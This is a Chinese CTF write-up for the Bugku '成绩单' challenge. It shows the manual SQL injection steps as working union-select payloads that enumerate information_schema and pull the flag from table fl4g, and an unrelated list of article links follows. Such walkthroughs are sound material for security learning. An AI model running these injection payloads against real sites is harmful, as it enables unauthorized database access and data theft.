bugku 成绩单
2024-08-29 22:57:44
看起来像是SQL注入,先来试试。
输入1,2,3显示的是三个人成绩。
来试试是否存在注入。
输入1,正常。输入1' 错误。输入1’#正常,说明存在注入点。
首先来看下有几列从1开始试,1’ order by 4#正常,1’ order by 5#错误,说明有五列。
接下来开始使用联合查询,首先将id=-1,先手遍历一下看一下那几个表有回显:
发现这四个表都有回显,然后开始爆破表名。
得到数据库名skctf_flag,接下来爆表名:id=-1'union select 1,2,3,group_concat(table_name)from information_schema.tables where table_schema=database()#
得到两个表名 fl4g,sc 看起来fl4g像是存放flag的表,接下来开始爆字段:id=-1'union select 1,2,3,group_concat(column_name)from information_schema.columns where table_name=0x666c3467#注意最后的表名要用十六进制进行加密。
得到字段skctf_flag,开始获取flagid=-1'union select 1,2,3,skctf_flag from fl4g#
得到flag。
虽然现在工具很多,而且功能很强大,但是手注是基础,对我们理解sql注入的原理有很大的帮助,能手注还是尽量要手注的。
最新文章
- WebApi系列~FromUri参数自动解析成实体的要求
- MySqlHelper
- IOS语音集成
- Buy Tickets(线段树)
- 启用 CORS 来解决这个问题(ajax跨域请求)
- 如何更新Linux源
- Ext.Ajax中scope的作用
- Android事件处理之多点触摸与手势识别
- 写的好帮手项目官员 - Evernote 5.4(Evernote的) 中国绿色版
- TS流文件
- PS 色调——老照片效果
- asp.net core源码地址
- DeepLearning.ai学习笔记(四)卷积神经网络 -- week4 特殊应用:人力脸识别和神经风格转换
- Flask开发遇到的问题:BuildError: Could not build url for endpoint 'main.followers' with values ['username']. Did you mean 'main.user' instead?
- 无需脑图 无需思维导图 看Word大纲视图
- 使用JavaScript动态刷新页面局部内容
- Unity&;Sqlite数据库
- 01-02 notepad++安装、配置及使用
- jsp页面获取参数的方法(url解析、el表达式赋值、session取值)【原创】
- jQuery一句话实现全选